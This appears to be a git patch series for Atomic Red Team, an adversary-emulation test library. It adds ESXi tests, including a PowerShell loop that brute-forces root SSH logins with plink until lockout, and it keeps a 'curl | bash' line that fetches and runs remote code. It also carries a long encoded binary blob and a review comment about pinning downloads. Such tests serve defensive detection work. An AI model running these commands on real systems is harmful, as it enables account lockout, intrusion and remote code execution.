z^~eGE0JEFy&yCZ<>CW=$^V6X~`# zBx6~CGeseJA}mZ8I1s)jCcx!$cb+$F;Gk*~vBJf!Diy&Mp6-G;lvq5F*z5vj5jI5S z&~L(CYkxHGw2^-R3qMU7SWInLNbguq+9Irne_ED?*<=~EAo6=5#*350y=@~L!?*3S zg0sx*tfVHmEd{C*XxubeEkA|edp3T{1OT|hsE!-|^D35Lr*VB;(o##MhoaV{hiCSX=A{wXx1jO2c5>ErRU_0HREf<+$Ezsf zmPl5*P3bqCZc0rZJ!!JCR<1kX)(9zGLlpDcJdmm)56&SydDdUIwCe+(k0-X{VCRXF z*ybC*bYTO1C&tTI%biL|Y&FihkN)Z+2EUaxAXI)jkDoYH4=7mYq@%I3XA8hWOeg5> zJsZUotj)pWj|P&bJeUtgXy_ucSF%KqjSs zCeP*qdRIFyo`OOsZm%>mSsPO z<#6a-qcGNu^*{S*n?PrSe#n?TGKq2{>AGfEO9oW&45P2R8%4J2c?AC4l~E8BhF8@} 
zIj|h2RN_pyz@>}omRm8&oufwnz>{c(w^OADQ~8i zOWsjJq)l*lmu<&W-tz2FSd1V}bov3>l+_ADkm%*>AO8PC3>J?mV+ z>47o^{}7X-i3aRPY z6K!d`#`3$jT(N|XA>yAKAO4EpY$p_2@{ zOB-jr9dl{$f2;#~@2d&1f z^u8WKL_foNnQkHfEHc8ZXB!ERYc`*~!in`$rvGhgi%Tjxu)%yq?gbVn?;~&jIkG&! zweX#9EQ$=*8LRwocSEYcx8%(6LzNrF6CEB4dpKD zqLr$8G>Fy*lNi7JX6RWXHO~iiq9Y&W7Bj9>oW*54zoJ1OdG9kLwGP{t4cibd_o{Puz@tTl12Q-A% zISwN5g;kaxSMq$S@9+29&jYCzkd;1ZuCBZOcb)BJo%f~(u!WRE_W92vs zgu)g_v-)>~3AMYljP~uJ0(T5aroS0515XdGIP;J%_A`ktommnkB7E$rogf3+Ev=i| zk}#=~W2?sqCUd-_wTvsWcq%V718QNk$zGDd$hKsfWo58Yxe*)Y`_41`AB`-jb~5z< ziQJBiwUa*N2uTkeE+=FOI{Pr4X*F+A-Tra)v1XL>-P`(}-~|3h!{A6@wDRZc{pHe~ zkQhMb*_IChz*1QJzTcUs2euH7~*TOo7~fkq$I9!auP5s3?)YS7!X1Vu(`wGRqSN zRsOR0Aj(VS=lI&0!P^*?9GnbZiKyJ1aS#}yvnuFlI$P#IivZ3dPmUBs$%7t@r}-YiQ0nU- zEC(x@;>H?);F$xEfG(7s3|fWxiNOko)MIIW{ov#g^!hjnu&-{h{qy;aFDXItx9-+9KwBdnG ztLOpTl)MqFGdoUPWr5N06HN|`uI^}GYELwTx1w1gOe}tf0H&wwvS8I@fJ}kev?6uf5iHM9ZkV8sZ{31oz6<4>$`jAxw31HGQVU%Vj zSo)v>PHV?K12OQkBAcwRe1}o@dv8})0kcFMl5SGjQmY|iPlz>ThNa(F%ioH%Vj4#f z4;jseby+mHqZJA^9kzzJ{!Y!;IZye1qlo<~umNDx^UVj#GtM8g; zDVo*U%Ou6;)iTNpSPm=C$DWTPGskVmJ|Q8FR9X~FmJG(GGg_C3Tf-g{GB*rd)6IVv zSk^9jvY8`{-jCefu6rJ$OSV4@cD|=}Y$rCwBE^s0V(AeeIyroK+*bh}kE;ZX^=R;X z-Z5GIPU-lg6M%=np8Eo-5PxJ^SAIG`*Q5&Tj^ZgxV^07Pu+7fCnNtN6dE{iJs!I2? 
zFQ;^vpWqNc-O%I5kL2}`$56#e^*i+rQy>FwUx7cTL+x`~-XyD6HJqq8%JHL|?q2Ns z3fGSR-C-ApvCjB4>Ajhzz8H!YkK)P4S0W!~Gk-icH-jVPn;RcusgZHva}H4Z2^0m0 z`eER`#E30pp6_F7bz;E9>=k&xDf^Hkpjrx2dt^ZQ!+P9Akb-Va#v^oJU+o2p*W+x4 za^q`-WV2r@)Bat&fhVT0l>H=xI{jV#s%J$+m79i-6+2tQ1B#W!N2EL{^3*!3C|kW_ zkn>Sna|FaxLo>#uS&_OT{vQ8cyEgx4+Dh5*{%$QJ;8~Z-aB}8BueuKx8xFECb~R^i)~Psw9Cs=;^f=F?0{@M%T#ab7v!JUii+%z8;OPYssdsjJ&g8 z=xn!Yl(IXqjLz^_bKZbiribb22?O%YjRh~G^&N^MLS4jt=e$FYG`9xkHSEOqt&IiG zJNTa3598SQz>1y~cUUySW5BxE;^gS!oMMvmgB8-q5aK&E1{)iPy#=YUF-F`+-OOt}hx-!|$8VzW%b*quu1#De?N9te!u+a<(nhP4-o6G>m`3v5zQ1M83k{~v%&^}APQGZvEeM&A-3A`1$-c*te z;0ng`$q_l=CSvCS$S8b9fr4aJcMY%}flc#3N9(>cLlXUJej^i!P@j*c?*(_k=vjC` zUiKe+>C$(mb8ihH0w1#@cJ-DfQJgqO5hAPTJfEGAav`?YD%4{DZ-Y*6R>{Gcxxh z(oR@&C%i2YPI;h%6dgLB-_;KAZ!DLHthb_O`x?ntLh)jfgYTT^WY2?kE>$k}-#S6I z0ixl0&l4s;TyMU4pZt`j6e%3QZ^D(EIS;KroAT)uNlcprxI>a8c9_94r&lsy&=>rq zz*`gVPj!8P?Uq^diN3_tiJUpT5Gpgno30O1FsA6M$wzf$%~7D&3!dJ2dnSE%QQJe&y~LN_tZk>rku#0>rI5-MG{Rn`UUR;+PDSM)L-?n#|gg&%`aXW z4mm!$&)k0%!_%Zhz9|*~7uhOD*BG9`T#dS#_6g>TO(_BvFh2*?TmUw4b>IA?{nlV7 zn?Vc+9Q&iO_+dlTp)NkuQYO6M^0*A^0(KTYf+PJKV|j=hVmo)-LwZeO=QRbn(F_m( zf+98c+Pw0hyx<9>g)75=b3+|YIa9c3Hk8l@!${~+S{U7-T;T*RSMRU_{q2J%%28z< z!5>ix^EBJ1=k8}SJO3EC?V3j|iJkewk6j(4==r_M#vZy2?Z5v%1aZld0}Gs2@_o7< zAEiL_c+w^P*jo4xedm^r_Xpm$;VAx;$ke<*rZ3HiM!h42m5MB3Kt3zfhk(izE*9m; z9;Q=Q6+gB1MhHB4pAq#C+dudu1*b?G>zU?X<%rMS7FWOHP^pnN(8JXx= ze^4n_{W)Bd%N#*F+n|7xVc9$s+VIA7ig`O0C)!b)-@Xt6T=3wkUDw$a;o3Z*?M)37 z6Zw;3$_jocb+k~*QY+@rY23s|2c4gbX@j2E=r`7yFO>e4kSj^pJlK$)^T2%gg8BVG zzs@&x`h@pAsk`+?#Vi5RbG@>A5kl$&zb3nZs{-qI`ok|2kyw~o51=-7Oy|ArT7b~cSC)%tzuJryC?<&S5#bJ;mh%<*Y) zyDKYrD=l@W=Au>VSyv>BspOTN}`^kFQKU}bt41d=7=O@3b zLAl#5J9&GxJngxGjUH^Z_jD{v2@50~IOz)83?^oiAKJiR31NqJ>p;>x+{O*ptwZq^mV|NP^ z7u&{q?g??U{4-MbS5PQI%y+1mb^f*MFIWlm%E0JmzodpM=6(OHpN+rZ)J3+9)wc6o zt;jD=iWxrLR@ma30j$=ONEMna!_@Dw)L!+0x|nrv1gz`LFPk}U^SI-}@bvCsJ6mH* zSFOfD=kt)y+<_ANC)Q?AmHtSfy*7^J9Ik80`l5q6`yxvqd-4n6K#hP)`zF|CLFa}& z>P4sJT`>dk@sTMs?b~2Kn?2dFI;ro#;4b*oMfv 
zjsfU(U#2NN$Pgmd{FN26NCOWISicmVBkQbtU9POwYgcBJ&)$JTGC+rD4tug`IJW`)1Ia%mF< zf5H6XxZ-3g@(S@%WS(_zRWs1A@BMoOHF8ezsJdzGx>LgHLwC*tGEYxj+)(h4Lv{SQ z2C#)vdMkUt$+d^r?<a*XmUw?^^5N0S9ryjKX!-<|ADC zhdrI`3OwEtCG@v}>F~_ZA~#HZ-*Qcf^p(};_JV%(sga2r6DYdNR?=&NRhnF3HONAv3<(!MD&tr@nD-dyYVa!-N86sX7krN}}gvZ~c3voe_4mwiTFY zo$UGxl*P>>bO{HFsXos8Eh%)F>|l6d3#oUJvh5f7x$5gm3O1Ua*+PBqJJFe^3 zx@EAGXJGuAC094s5h&gBmDfI~Nkv|7A`4R<2mTrXm-GBNR?&RLfH&0Hlz}FRPC7{o z|JSJSk?b!}H#IWVyzzP`{YksgpGxg^V zYcHj}X)cp=cHr)#{N_YKu4i@Jzd2EOXH3$cC;DMRLSsCUoqdqbF&RmLmh!-|Y+ z+m({GO6X9l8Ea!XPvdnkU&`(*AEHq_vg^U;xon#k3`UPFX7;}1(R|-TBM;3 z*Zz*%1Chv1)~9#L|50BP7Qt$d6J#DTL-?2Jx(qwf72|_O0`)J@DK0VOJ((x(3ShWt z_hxtP-@B_~L|hy@2QsM_gFM@E33&hUi=_Kq|1M>zVHFS$Z_s7Shc#(kl zo4Z;cTPPOju;ZH^)2wfdjT^j`%C6}9?DS80r!;}@kW;NH0jC2)@;{yAPVc*pRkA*@ za?fFG=bq@hj>OiF$x*4?R=p0`4}+N0WMvjztYB8WG>!w+Z@Gj_^;Kd;F#`2XctA?p zemaFIUpTU@X^bF?tlUG|W+9)-F8NI%*MD@9IObiaoB#3pzpc7W*_V{`iWRvYnB8^g z6@E(^k3aq(x;gyYaVbn&rH|wLs=)uLtg?%)?`3maK)T14p?J;T#T&9=4?F{-2XC)du1rDcH*KKR8uQr;Fl)*H zX%!eai#YK?zlMMON|}tPP^-n`O#`aatRM4%5BKPm_Hi&g&J48%0$z#C9fEmXDa!ee zler!YU!GJ{1G70+6SW3zitqbB8;|)qM&$n#M+GpV^`SS+l#XxtovvOJrhi#W&wmUZ zHerTkUt+`#f$*1GbB9Tvpz<+g7yi#v$7gqW^!`s@m2?oz z{XnHaFph$}Ym7_YO9F-<}7$i8J>U) zXZi2T{-5f7d$i(sC*I9va{TqV{>AGG=W&;YqNDbBx-OSoDPmbc4DBt1OGC}qTrDD{ z{W*2U;Yl6WujeAID2Ui}R9*@~-+|xSi+*jt^s9P8XjpJAD=Wrj&ywf&?BL?6EH)Z} zfh4xcLZTxy+^0gE^ki9zE@7DyGL=OF z@iph*o~Dx}&GkvCy&MF}@q$3P%ek)(>-?}Xr!uVehZdPE zfJo-^JQUsii4FMTt+du}^z(C>R@!|!wvE}wvT9jJT*2TBJE0-_l2R1D#M`Z=oSJ9w z*1wnk2_x(_3@bG43fuQE&JnpS5#edxKS3{~mHn_yBB&xS%E}jZY8D&>0iHb08>Gg? zMK*lGly}W~jvN}joH;#gPPXd$h(A4yFPbwK>IrW{+$`6x1K#zQ*_GJdWL7l1P9`Pu zW>35_lh9pu&zz=9r7;^;0~R1NlZ>Zf-n!d7SFC?Jd@I;%zxj%SzQM5V%WOR98!>}! 
z_*$`W-O2sW_Y?Jn6&@qGm0||hU_UxMIjQikTMJLI3Msg2@X)-S^v5;@aLHJ*c@`Ot@Z`)P%HL%PKCu!S?10p+Eqs)d!qm<}4PZh~tRsNA2X6%*vL+tJ z=ibw)KHvTOX<|bV_RrvUp`d3(S@=O-(Z^S}OS$o|bKk@(T4&yewXbF^{OjSO(8l$u zdNj|>gnYNU(G?Yh{AIg1`2R{LDhM!TTdDJQ3-s~CH}#6fnU{P7$v)qg>N&_cHb0Gu z#Is_L3-(|OuQY!=1b>c$tTcTD5fQO<5WC&b)3wB}Yp-n=AKo-4YwtFmaBEX|h2V58 zrIj5nWIViy#5>!-B6iQ$&&Rar@em0w5OOw0T6#PA`R3%F!Jo`nl7kv%p{v@wUNy1-I{TD&RiXOp;Re zU2S1GWs`PS3}m9GQ8YegWF>`~YO6&QQZLqh;6dW!X*SAYh*WdB0GUeur|XN92mx4* zFTGMZfTx!=00y4TUiKQ{30UO2miw;dfHKYo|34dq1#awg<{G5n>+{;(GUQ-X%jvbpKZMU_d$l*{g^Y-IIe&(K10ocM3MJ}XtC-VpmW+g$^z z#>;>-pd~@IT5vn!3yTzAP(!H)-tkX4oR5AC^K3+pO^wxdm8`xP4Uy3ucdGKucg|9C zky*!=9MWuT|5{eSG8e%28qOG()6e&PS>TjcAU!F3Zd>HqtMAXM;1~H~TI;{P@p5-f zxx%-&0%X?SoUkQSqu~(Im9PMarFl1RoW6xNsIty4&ZNg2=uScNs&2bPs`tr!WEo63 znC+OOHy(S71*Qt7O*UGoiE`_LD;x8NjSB=B1&5`HdPV5j5AtR7)ItA=_{K9M<&pJm zJLAy{ZezaE4yEhh@7v97kd^g?cUKDN{u7lAz5kb<4eeFnFRSt9s?Q9m$-Ic!t$7XI z@V8mt()PKY9HNVFIWu1L07Aq)->yc)Ci;aC%3ZHjaxlM^A z3NL=Dpr#O)nlIXE>{_ugtP;XpUW4zt)ZR}BF#BVGv z+{$C>A3U$#vrS%!qnK?s%@j2|iM~wtrv9sh_N@O;fL_IWQ7x4~9*f?`!n|QbEpjvm z-soPHy`+KVzlGLH?(##XHdt;9hiz z(u@MAmP6^(w;Hrv%aLkDF6Jm{p6|CntNCW!Do1=PriFj}}l3`d?2)*D)Qu zJ>X+)@uU#mkm>O{=*Ru!WfDFYQO@`l?c*&bUqg2^Uruf{<+K6b@ojj&!v;<8v+SGEIol#x)bG@DSheU9=r?G#Chgf(@P!GOi@fU7{s_GT zT<;d0ms|TW;9F(^?5FZo_=U*Sz`6=;I^$nLymHUbNyYQW9VE zVe|cz)GPMi<>3G=`{bnu)LUB-Dcn>eA%L8cr9#K^edw;$6-3euqsfZK58zf`FeBY2 zT#n2B#vI80RZtX+7Ab~>CGA@~L#w&`(?v31T6=bc+M-~V$Q1KbLN=}EneH13`xQ{q zB*;a6IVV&*5Vv}Y1~Oy)db+~Vzn$E|H0K||<$lhlqKZPg7sE}3kQiMy&9aggy`lwpbYV|+=R z?R&7{91^jg?0cmgJ-0jI8=LrRdzbKcZ0@D*SU=6#`GACSB@Pl|r+t<1c<})#GgdIy zG}z)3JBD;GBDP-AkT$U0=>?Hfy9@4z{6mDtng04j(+Ovn*sk`1h^gtD&*O$*lCP7X zo`7oP)3TFYv8J=}k!Ct~2=<+ot9oWsrc1#JJhw|dw=CJQlsrj1xZ}3ZMLdx1W1k11 zCY_&|qnlB)lewD_SrjTe+={hEzJcx=n+3UMq4RX&o_|JPf8FN8rlSWP7Vhq#TthTh zzC^a139r@bWpJDy%T zmmPzw4g`LUs&5q)_jMeWqv3b+PGXBbHLWKDzNgK%nRjf1JEuZpa`$-nHnWc_j;YL) z+&u-pO_=f|WAM5zp4+JnWK*2&SW1i257%{TgV_{w>D*&zBP|YLsRhvd7S#Z~9eg!U 
zFIW9JNI@SpExi{gDXB2Q{^@$x-&)8D*TGeka?)1;@|S`!dr0hB$#EVEFP2qW_9l7k zvcZj^L(s2~0&ylvY@78kx$TRGNokAsKcMuTe1p|m}hugA}bGu`D4?C zPBz5aRU=${-Z6HCn;)S2b(GrI8mZja-!=k({_4q3V8bq%g>vFvc&D;|Q`1&Qy954* za94b2oD-Qr3tukLIJH_aLfi`1J-j>(C>tviBGt!nozp`4{5rN!!ounch;?gh|BfN; z4vbJi4$BqIuBAkxTBLx=Cs6bDpX_p=mhaxrY{f}RNLd$InKb@oEW7<+3(TXg$LMZZ zreY8>pg!>k(vo$IjOcuswOeWET41M$$|o>+yC-*3C+tpggTMWOSmfrFSNJ9^u*h_B zUBOs9c!T^5EEMLo+PesW1C zeUP0)=lb)L($$h;+l$eSwcvv*jPk@uOwDGe&%+gjG4tA9DRk{D$^9{>4O*mg&QuUD zKP`!#lv*l2+@yzs&Fcth8`0DOH3xpiTj*5(Vj*BN#2X?_t=&87??FBQP8-i31s$k# zwk9GBK(p*~M|Tf=sd7Td7-%`t-B}jP71^H1(I4eM(O=@Eig6d3O;AdJpu=0d6FjEA z`QJ&H-0;FEDa|MPA1j_AM~OL&n>Vs+hx-GaI}&=-9E8(nTf8yl6BJHHR`hIts1Q^Q zC~P(O@)c%MNk0Lq#?&g!QJU;W_wlN))DqGKz|NJ4?fTiOV~fvvv(yUaG~B&x#K*n4 zXuVnL74t3jUiw8v$8!u>A!jdp?WPKDcT868bmEocUkS7}|DXNh&YoA%%9D`>B5Zq? zCLxB%9d!#e!M0rWy>j0nGM3qeQjnQb#)dZzb4rNwzcW zI51p&6Jr)z5leg@D7yZ~6WQkXsd<{w#?R0SxsQy-emaM_0UsuR=ApP8!1oH@UI`} zyM?os$G#4k;9-kG)j69C--x0jCo;KNB%vGNp|eRFz1R=w+r#^73xJg-$t}zWG=ts) z-5TV{|6H9~Ac~MLu#j?(5RX*)H+RgK*}sT_xriS-+Hq1a@wC=ghN}{8TILiXVy6DA3%qLE-niEJ5|&6c|~yRlh|JG$nvIiuz2% zJ#xOT@(B=qH9cpuLj#rb!vxpo_~5t7M?id!E5-4_B6zSM2q^3m2 zNG}(eQ$5z+Z{ntt>sDNQFFLLYdU@r;G5|Qd1~^D{&oK7eyB*9fVo%xn(lO{2WD|bwFk2I zC%AT!Q$ff#mQyuuF4WyC#bTk~xW`T4miGmMO5%65F+PCTyLk;?x}0-tBChv?K!g|F z!RxF4Xum$@c|TrFUIgIAOPlU_vf7jQL9K=d;CN8$KY8>}e6ZgeQZZZ<$~h%*gCLbI^mZ+3$ia3{7&l3_?G&7Cxu` zqZk=FAaMR(b$0YCU8H-0vqL3)@}78ptEqo0b4C4n?lwQ)H!Wr)<~cUwbn6PAP-PCt ziUD@oahESJ$YOPC)M#92dU+xb15&KuSY5ME11bN?HRtawO8~p-IPGnTW4_#eU~F0! 
z0kU@wx`t&qewtW5b`eK<=lejME;JMFIlon!=r6;lUv-Szr0tCm;DR!0T|&s^XZ`tX z<7~;85W&1F<8RLk_;w_qU4@%!#T}ddb18WbERnN{L0sCG53iDP&^<@u;2*dL)gWcc8@r>Wno9g?;w+JgynZTNzbqzh9|@vG)2sFg+4=af3LsHOrHaBc55ra zoyF?kKntCmP7YY3h_q9xCUR?khxI#n8HVk>*ONr!tiC8>@wv~YYEx_!BwzRyCKmyN}w^ocW2p z`^pZ8wU&O0LdoEMrf}c>C2)73o4&>T#8ZMPckWTSAN2I~rBCH2t&L37(&J(DyYDD1Lg^YC-$w&otTgg|xGx+Cwd8yx~% z&DStz$vr|Jcjc3pDv(n+az7O&0(`OpQuDju#;gNSM|#gDO;B_&B(XYKKw`)k^8`Rj zEkN!Yp|rO@se=-m4(y}A=cfLQKq9}|bBzikR6>@cic;p5Cgeb*alCR(bT40$H^qY? z3I7p#ySBvH_vA4CURU1SaBY8Hi#7Mj_P}0M-pe~VuHPHoUBD4!s6nYPta(}amd@WYFzmg5NwqHI@2)!Bb zzW7bjJzy{QU}O3Rtr;r!2(rgBSM^tIx~BTrag5AF(!S&_)1|}NbRMNsCQPX(*LFn} z6OydfLs|Ft;0I0ORXYAofT46@jvQp(JED|F9j5YpZ++QA2Jb+1TyJVije(?Tuu0W@ z;jf`>m_Te_%gT)#XEf!l>&WhO#O>7?-KcM=xfU_ zgnC;hV7RkcJYmL``D_(wU7)7pm6j_OF=4+>MnxK)OS(NBQ6NICP-!X?}3&`UGwu7^qn=ZX7VC+zFZHAMZH zXoCGGWt!Iq5Uc6m0|kB&1EEm*cUrxIR#zi|cpj_?Z6?&sXA7SZGD`9@>)yBG0Kd+7 z1Tmn{^uy$}smkDfB8k_(uQo+vQ8&TPEUq#sx=M-_IXzLqO)zKyB#uRn))r_i-rm7W z`uChnjJ2A8&B*)pOr*B1N!4}cCH3|f9IB(3GlVNDyXwutV>fyOkn_5AY#I2eNg0V`6F&yco^b$X%9by$aT)~1)Tkwm%o_bOV`Zu&CDOqABG5wgc!=dJgc1C%RDrc zclyw9fO0=H3!fjaqP{y3uSG1?v?B-vTbWW?Hxbx*6%pgYCn;Ny@!R@ zg3{x%)WFL8_amyLZToi?KZbH`jbFLt+2v9be^_o?)uBn?T;+vy`SjiV*qpN-a$+*> zi5h#8n9sj-v)T%*1NQ1s$71{w70*UVhYyg(XPkjT#FGsn4scsH%IjAQZBXb1zov&G z^@2)OcWZ1KlIG*X*!P^(<7aL=d($Ip!?B#$troNh(c=a7rTO8xo)-Mw)DLdK*xyV0 z{Fm}_nIbXBew?pGL!-?yJXCkfozL4H`dtTiruzvz3CjW7Lga(Bje}H)!H=0EHr%@^ za;-%+#o~?lNud`P0_u~z6oe6<*J`kru`2+!`;s9lfkB1TNZCJOO0Cg0UxhY(ogiHr z6w}G+!~;$XrYvU>!W@hm)EEI-8F?R%xb z-PlCUuFJz07B~OLG=gS@Qun4V$XKCX{OUn){bZG#{>Tw-!CLElm7Q^oxV+N4-@XKu zQ5hwviKbqD6;ArY;2O_Ox4MoBj(iB`hx@u2HH1Zx<|F-|l=kLq`ldqH!xIcFoknFD z4?&J{wn~x{2V3THti9Eu3{AH?$N$1{d2blHL=WR($mBE{2*c))sf)PrQ-Qxv2%=vP z!b>_l4+UM|pm-DKZ;@ScYO`}kkN4T#C}M|{Z&MJhULX^YtN!6QA)gwXu(^$6ji6gI z>s4TnVg$=NuicA^uzZ^59{cAXYJ7-swGv+DqSbNCiRY-Gct+q~JXnwtM{}K+T6XJ9RYfP&oRH3K8xS6`=fD|HPmPa?i+ez{M0!KzNuMbRl=J;% zzQv--vdPyAAR?b5wzva_q-mjm+p`IUhc_@sBxBuI4sH(bb#zD^M00F8XEF1gO@OL@ 
z&Z?E0CpK$CL8`bwNlJMHjlN){>)!StomIZY``bv@_iVD5!@oLGq_j;zPyG08;*iEo zFz2}Wh!r9i8@hUsF5p|TqDWLmsPK|?*B|w#J(;JK~!4v)Y;L$VbhM*e00vz@w z-`UKo_7P^UWnZ6PS8(8AOy)yoZp|Q*sc!<$+rBTo48KSDJm_s{woOqP2<{yUAT<*~i;KZOg33^@nE7 zH2Buj+B@yYuw`5Bmt^(Z)mCc2O#4OZ?Vo$TTegyKcbKJJ(_({rU_smEw>y~0pMnDS z$31Vc&uNr>x$Sb6Admo1!@hJmqs-NdThuD6ZA=S0z12MC@hZ|4Qxy2oZY;M~AAS;| zTUPS^gjO?B+0GNIcaMsIlq|UXeZ7_!xZvuix}O}Vl$WPeu$^}DZH4e_YtUX%GF5}(HY;N5f1PE@C zmr8ARbBX2Xz&y8L_v0`F>g48(9ZE&P7$*3V(-j!KBy(#}a0DXKYQ1p5^HoeFaIC?t zwu^i_O3Xv0TG|bXKG|P-#?DZzfN|?m*qKd7$(n(`4K_0lSkA#(5BY6nV%3W%qmt`Y zc)gc8YYbR`Z82%7A789*m;C&Ybjkg$z~(yIRL(rUzD-ek9YHSZv)e>HsW6Hx41N

- -Open Source Security Index - Fastest Growing Open Source Security Projects - -

+

# Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1514-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1515-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From 11400be95136a1170b196da81249618deeed38fa Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 17:44:08 +0000 Subject: [PATCH 07/41] updating atomics count in README.md [ci skip] From eba0f8ea6165e1a62c4cd40a0785785171a9a08f Mon Sep 17 00:00:00 2001 
From: adelfavero57 <78580239+adelfavero57@users.noreply.github.com> Date: Fri, 23 Feb 2024 06:48:23 +1100 Subject: [PATCH 08/41] Esxi atomic tests batch 2 (#2650) * initial esxi commit * second commit esxi * use ExternalPayloads folder * use ExternalPayloads folder --------- Co-authored-by: clr2of8 --- atomics/T1110.001/T1110.001.md | 46 +++++++++++ atomics/T1110.001/T1110.001.yaml | 38 ++++++++- atomics/T1560.001/T1560.001.md | 80 +++++++++++++++++++ atomics/T1560.001/T1560.001.yaml | 68 ++++++++++++++++ atomics/T1560.001/src/esxi_get_loghost.txt | 1 + atomics/T1560.001/src/esxi_remove_loghost.txt | 1 + atomics/T1562.004/T1562.004.md | 49 ++++++++++++ atomics/T1562.004/T1562.004.yaml | 39 +++++++++ .../T1562.004/src/esxi_disable_firewall.txt | 1 + .../T1562.004/src/esxi_enable_firewall.txt | 1 + 10 files changed, 323 insertions(+), 1 deletion(-) create mode 100644 atomics/T1560.001/src/esxi_get_loghost.txt create mode 100644 atomics/T1560.001/src/esxi_remove_loghost.txt create mode 100644 atomics/T1562.004/src/esxi_disable_firewall.txt create mode 100644 atomics/T1562.004/src/esxi_enable_firewall.txt diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 672281b661..2f047046ec 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -40,6 +40,7 @@ In default environments, LDAP and Kerberos connection attempts are less likely t - [Atomic Test #7 - SUDO Brute Force - FreeBSD](#atomic-test-7---sudo-brute-force---freebsd) +- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi-brute-force-until-account-lockout)
@@ -431,3 +432,48 @@ pkg update && pkg install -y sudo curl bash
+
+ +## Atomic Test #8 - ESXi - Brute Force Until Account Lockout +An adversary may attempt to brute force the password of privilleged account for privilege escalation. +In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** f0b443ae-9565-11ee-b9d1-0242ac120002 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| vm_host | Name or IP of the ESXI host | string | atomic.local | +| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1110.001\bin\plink.exe' | +| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5 | + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell + $lockout_threshold = [int]"#{lockout_threshold}" + for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } +``` + +#### Dependencies: Run with `powershell`! +##### Description: Check if plink is available. +##### Check Prereq Commands: +```powershell +if (Test-Path "#{plink_file}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +``` + +
\ No newline at end of file diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 80a84566aa..0ee6159345 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml 
@@ -263,4 +263,40 @@ atomic_tests: curl -s #{remote_url} |bash cleanup_command: | rmuser -y art - +- name: ESXi - Brute Force Until Account Lockout + auto_generated_guid: f0b443ae-9565-11ee-b9d1-0242ac120002 + description: | + An adversary may attempt to brute force the password of privilleged account for privilege escalation. + In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe' + lockout_threshold: + description: Specify the account lockout threshold configured on the ESXI management server + type: string + default: "5" + dependency_executor_name: powershell + dependencies: + - description: | + The plink executable must be found in the ExternalPayloads folder. + prereq_command: | + if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + $lockout_threshold = [int]"#{lockout_threshold}" + for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } + name: powershell + elevation_required: false \ No newline at end of file diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index 365a35ba1d..67ad62df49 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md 
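Review bot: `get_prereq_command` fetches `plink.exe` from the moving `latest` URL and the executor then runs whatever was downloaded, with no version pin and no hash check; the same prereq is repeated in the T1560.001.yaml and T1562.004.yaml hunks of this commit. I would point the URL at a specific release and verify the file before the prereq reports success, e.g. `if ((Get-FileHash "#{plink_file}" -Algorithm SHA256).Hash -ne 'EXPECTED_SHA256_PLACEHOLDER') { Remove-Item "#{plink_file}"; exit 1 }`, with the placeholder replaced by the published hash of the pinned build. The test also has no `cleanup_command`, and its description says the attempts may lock the account, so the description should state that `root` can stay locked on the target host after the run.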
@@ -28,6 +28,7 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi - [Atomic Test #9 - Encrypts collected data with AES-256 and Base64](#atomic-test-9---encrypts-collected-data-with-aes-256-and-base64) +- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi-remove-syslog-remote-ip)
@@ -502,3 +503,82 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};
+
